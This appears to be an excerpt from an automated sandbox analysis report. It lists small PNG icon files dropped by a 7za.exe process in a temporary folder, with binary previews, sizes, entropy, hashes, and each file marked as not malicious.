      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<..._IDATx...M.@....p6..:H....*...4...t.....1)a....{...Z...d....4.d#m..[o<Oq}...=....@..$.@..$.@..$.@.....8..zV...h..:.t...&..p....7.c.se.H..=........&.N./......'.q..([]...2.V..2...y.......?!@..$.@..$..F..!.h.^C.Y.>@....=...8..j..j..QgU28..n]$p...y.....An....$*.~..5..z.xk.V.`p].L.l.y3.|.%....,../>.l..:%...5..R.K....Y@..$.@..$.@...N.M...'Mf..=.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):788
      Entropy (8bit):7.597476646435757
      Encrypted:false
      SSDEEP:
      MD5:BE602168A3D649DEFA9AB3251843A6CA
      SHA1:95618854C63448854E62DEDB9D6C160FA2A329D6
      SHA-256:89ED7E6D7BA2B283F73DB1BA545FBB3611855C900F2FB035AB6FEC5B43F622C5
      SHA-512:70C95892AF3206277CDA4C6017F081532CE3930A943912973B87BB4CE9B3A4ACCB36B989E139C52B91FCC463F40D1218079A62B9A4133028A2E2416ADF124CC0
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...q.@....{^....X..p.!.C...."."@....W..............$#.....).....{#.........B*.B*.B*.B*.B*.B*.i...A..z...I...w.{Q...=..U..A..Cc..(,..J..YA.`..c.M.......>...h...!..^C.{3x.a.4&.b...N.f...=...l.%$.....Z.P#.-c...Y..a.....}.......it.7.`..6.+..E(..|......y....\..x...%.M.9..h..\k.bQk...........bDs..!\{(,S.>.f..........y0UQT..yck.z..P2..}IQ.....t...z>..'..Q2+.._.........{Vb~.:M... C...~...A.^d........Z!M...y..-..[...v.`...'..<39:B......rk<..e.E$!.{...$O.XvmmR-.j.yS..u..1.k.>...=D1}..Y..\.......r.[.Lq}t.N.S.|..k...*.%..B.^.|m_.ZC@..zVUQ31o%s.... 7...c...D.=...R.FG..R..'....bgP?.@..)6c ..........s(..BhQ...P?q.X/..an.N.bJ..-4o!s.R...!.6.s0...B*.B*.B*.B*.B....0..E.*.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):372
      Entropy (8bit):7.035487139333461
      Encrypted:false
      SSDEEP:
      MD5:2AD4979AC122A8BCDAADC27E23BB9025
      SHA1:3238076BA6508299D415368473A90FB0DD9FADE4
      SHA-256:39DC4E6DB48F02BA4C4EAE183BD0DF994D609BBD84D2127C42AF48692A420206
      SHA-512:8C59904AD3C1C17D1A08359BEB484D09FBEB099CF3596772BD2A190AD30C5141D05B13B819051244B014170437B8AEFFEF2327F654F93D9A3896F6A071B944FB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx......0..qj.3.....G=.........z..t.....@.r.Uk.....C./.%.AUU...A.....$H. A....$..fh{..j...$...UJ......R.5.........\.Id...}n.e..A..\...e.{C...Zbo7.-..r=.....$H. A.......9H7.=.>.0i.._@f..I..........M.7g..h.....R[....la.L7/.(._d)......'.1.m<..3. A....$H. ..C...g(>..C......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):7.730621689283119
      Encrypted:false
      SSDEEP:
      MD5:D1D9784E01453E5E8F7BD67F307A717A
      SHA1:2780511B41C71C9674206965775E2C18243BB4CD
      SHA-256:BE636BAFCC357034EF70603824D7D88CE8B244696EAFA9B78AB96986F2FC875A
      SHA-512:05F5ACD8C0D5B905EFB6C39DBAD14F19354FB8B71F0AD05371795845C492EEC794DED8F1413B8EC70CADEFD0561067E0C9A36FD2C77A5CE771888F6F154AA3CC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....sRGB.........IDATh..WKHTQ...1..t.......M..E.lSP.v...t.....hSb..(". .j.A..6Q .d...3..Y.c...37.5.{.................4.a.0`.0........a.0`.0.xg@x../....b.h...?c.....5.h......X..,..;..^.8l.Q..+- ..8._"..'t.J./........$.....9D...s..?.L3..ni..dRU.V..\..'...$V.:......,..4.=Le..=Z..>.b....y..L.u*y,.!.tF.B_....z$.....9...]...S..T.......'...j,..C=.#~A....hb.......=ls.P}q../...F..g.....Fb/;.....A*.K..t.....|.A. ..]/e..IXmr.wo..`..p].3.).s.e..A.*L81....'..X|.i@...68{...^..c 9..N....y}?:|....L7..s`.h>.G..8.X/..;....0....zU.e....Z...^..;.X.M....v...y.f,....@w,.d.rl..qM[$.:.[V.5$....n(...=s<Z....i.d.@R.lg.........^...x30.!...N.D..L.....s.ptD.J..N......`..p...k...oA.h......NkV.....l.....>.t...p........H..l..X..:+g.j9NG5...l&.L.U..41k.%zP.....~.c.=..K.. eee...l.......HC........;.....q...:.......f.I../.C........b-..{.'>..qt......s<x..%.<J.q{...y.i~....tDr!.D..[xa.Y..."j..H.Q:V...E...4.../.i.i3_FNF...i.......0`.0........a.0`.0....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):514
      Entropy (8bit):7.4046070824089005
      Encrypted:false
      SSDEEP:
      MD5:19A4281F04221116A84F4A353FCF0113
      SHA1:D4117E8C1A5836B0F3CB961693B8FA2CB11EF264
      SHA-256:E2BEFE147560AC07A7358B0C92AEE66C52A3C8DA6BF0767D8DA3CE11B080A3A1
      SHA-512:24E918BBD18B5F179F5E99356D623416B3AB17455F0A61DB8F2119CFE7168AE78AEEA2BBAE0BB883DD1685DF008D9CA2D841D02CC59F21A74A2937BEF5193356
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...m.@.E...S.KH*....T.......'..T...;........D....I.`/...bc.o......e....y.0.IHB....$$!.IHB....$.7.o...1?>s...dR...?..}.s.Z3.S...E2.G.Gb{..uPro(.&.....U...\.....G"6..=.v.B.`.2..K1uc_L...=j.%...B.B..^.b_JC.n.k....O..vZ.1.....;Y. .<.R...O...g!E.".:U.&.P..NC"G*d.#...k@......#..6+.5.Z@o..@..j.r...K....X....V.......wt..(..v....F.t(..L.Ad...y.....Y!eL...S.I...5.^..z:uhF....*..F...IHB....$$!.IHB.....`.C.....w.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):478
      Entropy (8bit):7.200611099379833
      Encrypted:false
      SSDEEP:
      MD5:2CA4124B92345081ECEB0EAC0795DDA2
      SHA1:4EAE3C91518F310BB1D68BCFD5EE6C45E2BED6DF
      SHA-256:F0395B3AE489F88D89C8EB86322E9F09FD4153E495BC58E91993756B4B022681
      SHA-512:280C64BC1E489DE49AB982DC04059FF145765B2D4C0A5CCC1A0DE0BB015F57F04CCE6E6B8572210590C0F930AE860F17930E70B285582A6D07F75C0F10B401DD
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...AN.@......{.N ...u#......O`<...V.........E._.7....B....)e._.tf^.PUU.z...A.RH!..RH!..RH!.L..B8:............,....}.... ...W...>..S.b.D&....3.'B.=..eoc....n..[.9d......x............@.......sG.8$.....1`&[.zN<........uB.)..B.)dR......H......_.VQ.1h...^.2y.X....I..&..U..V'...........`M.Kf.1.bD|=..z...P.`..`V.^....CYeq..:.GV.h.n.....}..{..".?k...['..B.)..B.)dG......|....|....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):584
      Entropy (8bit):7.517009785076435
      Encrypted:false
      SSDEEP:
      MD5:ADA81C75FDFCDE80E38AD394AF5A5044
      SHA1:9892FA85F299C8E7BF1B2AB086E25F12839FBB33
      SHA-256:3F79AD6EB7576A2E61C9745940EAD841BA86CBE75D756786E424C11315EBDDBF
      SHA-512:0BEE5395273D4526D37039029B3ED870F37ACAD8B92D88BADBF7F0FFEB3E3FE77AEDFD3975562B5FDC6F4B7C429045D0A128C503337467502B546BD146512616
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..AN.@...T...@z.q....lO .............G.7.Z..&.I&.L[.;..........<..4M........$$!.IHB......u.R.x.....c.U.|..f"..h..c.......N...'.....W..M....x(PA.l..mc!..0....a..\.i.spM...ga... .....b.y.e...*....Z..J.R.,0Ev)>.r3.]A....'....<.@J.[J..(.......;.&.@.!Z..u#.'.t.vj"....$$... W7.........k.T`K...5.....x...h`......F m..4..&s.&.9.:..#S...B..^A8s..(%E......E. .s..k....CI...2..F..k~+....VAnP....c.(.=...G.7.x|...~..M.S.F5.~.\&7.~....zP8...v.g.B....$$!.IHB....$$!K.G.......`.l....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 55, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):523
      Entropy (8bit):7.39182118916976
      Encrypted:false
      SSDEEP:
      MD5:05A30F28D43CEEA121C14F73B3610BCA
      SHA1:10CED2FC9783EABB3D6796939FD2AE9AD211E304
      SHA-256:C5A2DB062858E2F23A1A8D9CC80354B09AB2AAC4D223066274EB67D3155FE97B
      SHA-512:F568B39D2C9C0868C5FDE1246A79EE1FD7822EF9A6921BDF953C3B04298F7164F97C2B3876F7A39FB25EC24DE7CD88ACF6F2CC1BBF15578B3C57E4DB9B8C11F6
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...7.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx...M.@.E..p....\...S.............).......|...#..E.ag.k....F.......).".z.?.!.IHB....$$!.IHB.....A;..b..vG....a...s..{z:.:.1.f<{WO.X&..2x.;...$....wI...<@..i.wRB4s.(.3.,..5.5..+G0..^..X..W.....@.......-L<....w....Ln..hB.j.'..x..R..9/...THBV=x._I..u..L..>l)p.j........w...D......[u..c...4m.O..u....r.#k>b}q.x(......}i..Z.mJ..K.N.....-%Q....d.f@..16~\.wU......A.E.=..t...L.M...:i.A.k...z.......$$!.IHB...m......~.;......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):901
      Entropy (8bit):7.6651836238309565
      Encrypted:false
      SSDEEP:
      MD5:82FAB16443C1DBAA427098B9EB13DB63
      SHA1:4E03699AE5A52F968810BF227BBF3988CBAAC075
      SHA-256:F091130F69F698955DFC7652B6799CBB2879608BA701F0992B5C00CCACFBF500
      SHA-512:C52C19B10CE7594C8F46D2666FA4D9DA0EA265CA1465EC9742D375EC6EEF4FCE8443CF5A182B27E0F35344556701CA394012602A599388E0703D01FB951F8CA5
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<...'IDATx...q.0...^..lPe...D~l...lO...$^.v&.2.......V'.6...>.@.g..#%....1.I.>..@4...G...;z.-@.... .d....2@....Q;n.A.E.....S...y...........}.<....I.$.V...cB.D.g.X. ...&B.k..P.y14|)..!.4w.%$...@K,.].....CY@.%...m#g.g!....r..9...&8.NZg.$M..i.K...=.90.......%\ya.0S#.v.....`..lk..&O.....#......j'T@.)..sZ...-h].u..u{..hc.s.x.Aw...%.y....+a.X;i...\?|...T+..TyZc.Ch'......n.i.=......e.....a.9.G.gF;k..p>K..8..B..?..OFc./0..Y_.9gj... {.<i..N}...k....at.Y9..P f.F...... .........^s....]h....v.....r6.y(..R..{bv:.YG0.\.v..U..@S...Q..g....!f&..^k.......FyK...g....{...........!L3F.c{].M.K%...Lh..,&..+D&.6...T....{..Fx....s.G.Mu....$....22]......`8...^...{.$..f. .NDv..L..j.....o.]Z.....i...k.... /....C.Sw'M. ....4.&..Z.x..U.shh.*.!-.+az.x..j.o...{..?.....2@.... .d.......`.....d..h....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):609
      Entropy (8bit):7.429042577118027
      Encrypted:false
      SSDEEP:
      MD5:CB5EE51891FB37BE511D19247DFEA186
      SHA1:AEC92D6443A9A01AB7B825454142DA97C88C32E7
      SHA-256:BA61EF7372E95B959F1A7D4130B5D265FB1C7C2B2388C7606B294B0AF2CCB441
      SHA-512:01F6F9A5DB3305C2EC30C995D2F4F25399B3A769B7ADFAF32EC4CEE943A4C6BA5816FF51E25DF6F58B2FB3BC1F289DBD30A601D6602675130E4C85F1DFB5BFB1
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...Q.P....=C...P...E.@*........+...... %p....?N.@..[C`wf.......n.[....9.QH.TH.TH.TH.TH.l.t.>.u]..]...-^.........NLn.Q..$....I.].9Y.>.&..i.$.f.c...q..7.].D.....$.!-K.d.9mxU..]Z.H..|.....U....u#.\\2LL..@.............."....p..z%....V.h.$@v.....oH{....5...Bj..%$K(.]..N.j...M9...3X6K<.Y/9....`.D..._.PG+$.o.......,..b..M;'..z.........NFMZr.....|ed.y.....R.P.0...B.*!.AW..l.f.,.D....Oh.+...t2i...`..p.`0/ZMbb.d.....?........+..gMA.....,..m.....ot.....5.jK.....1.s.I.TH.TH.TH.TH.TH.TH..!.....L4.K.^.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):162
      Entropy (8bit):5.768126507292286
      Encrypted:false
      SSDEEP:
      MD5:C3BFDAEB0546AD7B511D3211767A77F8
      SHA1:262AF5204CC63C7EC9D3FBD0A43DF9A18AA93367
      SHA-256:F968D9A05998DBB32F297D5286DF31FECA47045D5EFB07A9908B817E0DA0A8F8
      SHA-512:E472A8EBA1EB64F4EDF2ACDCDCD6F1F7D12BB51BE4E37D8D2B4A319BB7A508929CC500F7486B47F933F073C0E4B9F7DB3F9E0B4DD7E9EA910DCD996DB7277125
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............V.W....pHYs...........~....TIDAT8.c...?..l.......1.a....W......At4........a..5.P...5.`...a)>5.F..O...............O..(.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 20 x 18, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):349
      Entropy (8bit):7.068817434399836
      Encrypted:false
      SSDEEP:
      MD5:9E59AEB05D604A08D185BC957C8A7FA5
      SHA1:44BECE283677C2B3529C2522C4FD503C3D913360
      SHA-256:DED003972E628939AC1E066C9015AFFA38EC9394D3F1F601EF09B9410EE71C43
      SHA-512:71E93B2BE888AAD57339A3225A1AD64492B75083035EEB9BD707235A31CE2992BA8E0244208B5725D7BFA1157C71734E8EA4321709D5D907E846E280EB50FC43
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............[.......pHYs...........~.....IDAT8..]q.0.....{......BH...A0...@8..........q<.V3...RV.132k0...H..!w1.`7.`f7}w....rZ..%wNz.e..pQ&.../.....K<..Mv'.b.9.:U.s4.C.Z.X.!\..`.V`.x`.,...@.P0..D.\..`...?...|.....?...6...x.._)w}............=&...Q...y....*.l..........G...C.@......yi..9...{..I.A_......{..)....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 31 x 22, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):304
      Entropy (8bit):6.798029943186228
      Encrypted:false
      SSDEEP:
      MD5:B8969168A55A89554CE6591C40C8C0AA
      SHA1:5C0E4F4A60542B1102A00B82ED73409E9B0F8EC2
      SHA-256:D8C69589CAF87DF32C8A732BBDC5AC4EDDF600E97AE1CAEB50F6358B61219A5D
      SHA-512:9F4E23563AC65B9775867C042144C21CF00AD77ADA5BB4116BA957D3C6BBD9D7F4C08EA38C9DB64F2615685E167A202DC8F03F941F26B2251F8F0001624330FB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............8.G.....pHYs...........~.....IDATH......0...?..8.........d........\..7...RMD*mx.&=.i.}}M^..e.....X.e.....Hom.'....~......$o./x......8....0@...B ...4..y.....&..........2.+...`,..y..K.........7.. ...}?.q.].}...w)...t.(.o..y.Qx......V.].8.O.D..x.....u......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 22 x 37, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):364
      Entropy (8bit):6.951781540298766
      Encrypted:false
      SSDEEP:
      MD5:66E9E67F8928D9E11871DBCB4DA4F552
      SHA1:9A9BBE4C13D84A005F3F94F664F36AC3CC215CA3
      SHA-256:68EE7030D6073BB6068C4182A22F1D5E0A77F89E95BDDDC853AB82C4499F3033
      SHA-512:1A4D02C7F63F95B644FB473B3991D74F8C0ACA9A9DEC5ECEFC6878C64979CC974D560E3AEC68EA5C26097A77F7A46C5460F3CBB8BFEC876012A97744CD35A42B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......%.....FZ.8....sBIT....|.d.....pHYs..........iTS....tEXtSoftware.www.inkscape.org..<.....IDATH...j.Q...1!...q......>....b..6.O.R|#E.-."......;.1....P....h.....*........$\...m..46..-.i..5.nl.N..H.o.......x.O.gW.a......hd}p.UD.|Fg..X...g..P......0.-...]..~..k.ZrA7.h....-...-h.G ...4..A.@.....`.............jxWS...|O......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):578
      Entropy (8bit):7.469692085655479
      Encrypted:false
      SSDEEP:
      MD5:225FBE9269E5E4D16DD02A8623567F31
      SHA1:3B3E7208F6B26DF47D66EC1AAFAD46213BE0073C
      SHA-256:3B1627C52CDB2DF712E007DB042781C52376D8FC89A240FC7C5A933AF64E74F9
      SHA-512:2EF0DB36743976E15CBDF10299E0A31FDBD6EC4AB3237124A612B5B0207FDCB29564A605B1A26AD2D5B774746583FF8B32DEB702654480A6B173A6D0632D3BC8
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...m.@.Em..\.9...0...0w$p.N*..r...:.:.C(..$3.X.YVB...K.=..}.wgv..L&..d..|...o.1t3h..Q{h'...........9.}.?....v.K......o...]_...k3Q....m..Ve....W.N...X.....4@.4@..`....nGE~X....m*u.....]*..*...5t.4...0.#t8........_......7.S....Z..^.N-..dR...yW.O....[.D..`...*...Q4u.. .......?.T...b^....}.S,]@.s.2A..p.X.dQ...L\....Q.n..m.).4.-].S.6e.Y........$...}....i.-..%........x.,.<^{.k.=u@.DJ.......g.....%[....z.H0.$mJA'....\....~Q.`....U^h..."..$..d2.L&..d2........S..c.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):326
      Entropy (8bit):6.884516128847496
      Encrypted:false
      SSDEEP:
      MD5:8390706C119D4AD44F1F7B2ECB40D4A6
      SHA1:C96917CC48348288BC38FEEBA0C2AABDC8B9B796
      SHA-256:CA7B9CE50803F13485E24E1D7203635B6CCC740BB75D8A6A6E8AEC5411BE827C
      SHA-512:03BD64D4180A0ACD9F1F740E8B6E375E218D117D43CB76E13A681AC43059D163F7AC18A170753C5BB9141D8C814549736386FEACB91308E8754D81B52C8D4C76
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx......@..q.8.K8........B...l.%..44.V...c..'..%.S...... @.....Q./.....v...a..@.."o....5.R,.U?_.......{j.pR...p...[T`c.....Mx..0`$....HK."RY}..Xc.h6.[.a...dH2.Q.$...I...H.!.0.M.k<........ .,...f..{W.-._.,........ @.z.0.*.`.G..H....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):884
      Entropy (8bit):7.63019871258897
      Encrypted:false
      SSDEEP:
      MD5:E4E8B49C82291BEAA181DF19A7212739
      SHA1:922629C346AC3906013C145407DE32F607858966
      SHA-256:4848EDFF0F8001544FFE268652C8BA194DFF7EA70F2E4ED805D9AEF8C3848008
      SHA-512:FE595F1791533DDAE1123D278E2DD8E3281480589D32B45EA0A729D64157D427F512457EFC13BF6FD8F0A067C856DB2E09C2846FE8C32E60C46A0E6B8FB49F7A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..YAr.0..L..7p.].N.......w.8.p....qN.9.p.8.....7h..<.h\..$JF..c..........{......`......`.x...}~8.pI`C.5l..S-...#..?.].6.F.....a.5H......W..(..M....~.......w~.......;cN._.....".d.V.........X..so..x........_..{...Z.....58i.q....&{...w....rF.:L<.......=.{p{...l~f:W.fL0.W....P.|...U...w.z+`qoK...f6".....Z.ViQ|.T..j...%\..].K.K.h..S.bi[.........K..eQ\F.'I w....Cf..)S..{...M.*.x$U....0.0.H.u...G%..yl.e..V.0..._8p%.s}...5...o..gMy..M.T....t~.+.........RA)...E7.MuaJ...s.78..k.j$..8.,n:.,4:h....G.a...#.h.6f_w...`#r.. ..AT..Q.}.f?.Y%...`.Q..>1....W..2A.=9m...g.<..r.......+|.$.<.V[Q....^JA....Z|.+..s[..f..B.1..(.$.R..)Y..[-....t..O...U..0.......)oTf{..,...UN...V.FG...}.k.;.DvY.l>rB..iT.{......1...Q".....g1yMy...4/..\t......`......`..............X.-....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):876
      Entropy (8bit):7.719353023684941
      Encrypted:false
      SSDEEP:
      MD5:8B3D7B4AD7F643FA4A53019FCC6BB3E2
      SHA1:10F02C81BBA8829BDE5270A7876044D6C77BF5FA
      SHA-256:C34E975AF9D5F51461B427EF3FFC86CAFECE5BEE64C813B9D734DACCD954144C
      SHA-512:53C2370A8FE566B8B33531D56AFE0A2359B93F5703F9FF8502181928EB77AB4419454D6646400B8358F563031DD5A962BB8415726E53C494715D2EB6E15DFD63
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y..0..-..&s.{R.$.....J+*.*@+.t.SA...}.d:.....g.e.8v`..$......~...E..........;..~..e......>y$4..)......PC...Fm.......B3Kj.5..9-~..t..k~.[...RR[....zF....3...9.......O..8.._G.cJ..C.....X<.....<.~:r@...._bm.t....C...w...9..!.....[..1....".`.Y%......~S[....JN.^....B.....c.aMT........R...U.F..g..4E.9+{_lkN..C...K...:..\.W...a..7.Q#m.y....-.f.J....rt.[..... .l..[.>...........}............!.W.7.M0.e(.8\.lt...}.4........6...Hu.N.].i.I.E`xv$.Y.h....q...6\.pl.#;.2..~...{.........W.6...../...,1D.Zg.._`.j^..... ..Sf..V... .T..}kP...M*5.Ip......)...b?....M.0....\.X..Z.4..(6..ui)v.).7.|.n..........Ah.Q{.?.k=.F_.......D.F......Y.\.'E.!.H....3.....^&...RA^z.d.y&sc.+...K....H...!9;Z ...(+.kr....z...j.._.t/d.m......W.kP.4..}p0...o@@@@@@@.......(.u.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):688
      Entropy (8bit):7.541999359350979
      Encrypted:false
      SSDEEP:
      MD5:8DEA433620441A336B39259718FFF3A4
      SHA1:55B6BDA4100D1E54D1C23AD5F327EE0601CC2A9A
      SHA-256:E37AE7D62C5E2608754C079E299B7B99D092AE867E0EBEFD8EDDD219D490B53F
      SHA-512:D8FA86D72718938DFA6BD770AE777A53E7E165C39A9BCF9CAA6DF15D8E64FAB75A7B791AEF0D968215B11B5BB7E5B6559CACD4A59D78B87D06E82EEBA75F8629
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<...RIDATx..QN.@.........3....lO }.AO@<.>.^8.p....g.(7..t&..7....v..O6..Y..3;;;..R.T*.J.....M.n..M..Q....m..0ZU..K.p.6...3..r..NZ..M+..o.M.a']. n.1$../.X.-.p..h.G..5_...M.......kR..@du&. .m.$....!..k.^.......l...nL-..l....E....}.n....M.. .[p.{.)..Rw......... \..9%..u/.S....4.SA.9..7..<.....x....d8\..H.8...K........@m..X....Z.q....}..-.... ..$..J.;. "...-..].p....sS#.l..K.\e@..#........J.F.ah...>...>_C..W%U.`.....\.\.6>...+.HQY)B..=d..U.H..4.+Y...#.Y.....%....K..*..Z0.d.y.QS.F....<.,...&K....%.......$...M......vQ.8.g5l.....rz.|.+]T.<.P.N..[..JxS...Dk.$\.R.T*.J...%..?.;..f-.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):250
      Entropy (8bit):6.504083233823511
      Encrypted:false
      SSDEEP:
      MD5:C030F84C409FB7356758F51CF979E294
      SHA1:1F0FEEF9B3422AB6737C23805237357900547F44
      SHA-256:300106F0A0CCA7F574984A93E3A181763AB6C07F733DC21DB62469F1FD767C32
      SHA-512:AC8BE347BD548E3AEE50C3354AB775E119C50E332CA6BCC7350625A20A6E805AD99282FB551833EC74E0E1BBFA49A98DC16861AE568B70FFCF037C39D6C14984
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.....E@..@.T.!!.HH....'[.Y...........t............L...a^...|...V`.E....[....4"G\.......`P.k.......V..Vzm\y{.Q7..E4...Qk.........( `.....3|-s...w....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):335
      Entropy (8bit):6.934958446389865
      Encrypted:false
      SSDEEP:
      MD5:9924667AF568704E8EF4821AB57483B7
      SHA1:1E8FA464115E8520B6881FA84E19443C2E7C5DD1
      SHA-256:1502EDCF8F58CE56844DDC01BF7FDBA50384A9108ADAFE1C35F3634A3DC0E072
      SHA-512:6555B54255D30B65E2DA4747A825607440D3F52A0895566AE98CD2DFF3DFF3C52C5FA6EACF99FB4885AE916B0789E8D60EF0BDF2F9A535E406012D72507AF8F7
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..... ..[..\.w;.......|w.'.w.....j,.=h./!$m........... .>....>.tQ..>..).@....%c....e..A&'...mb.h.K.m"~.n...8..8d0.\.w.....`."......x...A.m... ....U.....).c..+.I...EH.&#..X....<....nl.&.j.Q..7.....Q.....T.R.t.T..@_.S-U.........0.J.O....G....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):385
      Entropy (8bit):7.07906031813918
      Encrypted:false
      SSDEEP:
      MD5:57EE38329325FE8547B4DD6858A132C2
      SHA1:ADBA338ADF499351EF1681EAC41C1A3907F27CB8
      SHA-256:8E27D8ED24C4A5955F0274440B20C7A8DD2869F9A766D611700E66473D91770B
      SHA-512:8A23176C50718221D9281A119BE545C46B52291639155753A886AFF29AE16107B8FDC4EA7581A3B825743DBF892332BEADD8C9E798D59D5B891F87994A774E21
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<...#IDATx......A..q+[..8.S.:....T *..;...*..@.:..d..d....'.....y3.[...U....... @....3.o?.\..1.....f..G..M...h.....-W..l.<(-.S..\...K.f.....t.V\....[d..(=.......]s...{_..zsg..{.M.G.J....s...9P5.Q.M..-..Fu...f_4....{..B.n..<........Jby~...ey..*).....*..L....0Ec{|....... @.....o....OM[x..K.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):772
      Entropy (8bit):7.608464258883433
      Encrypted:false
      SSDEEP:
      MD5:F6CC93D9D189998B421AE5D04594C6FB
      SHA1:825FC74E4C1C6A49271EDA65E547469BD096DCDB
      SHA-256:09E7A6755F0766EFE4DF2E96ABABB2583E0BBD89B23848387F7F1CBFACED540A
      SHA-512:C4233BD8B7975322F335E24C324A9DEB819BD39C5555980F073B355403662C1D92D64598727832B191A363F1E1C4E8AEF09D436A7D3F5E478C0A709FE563E4D5
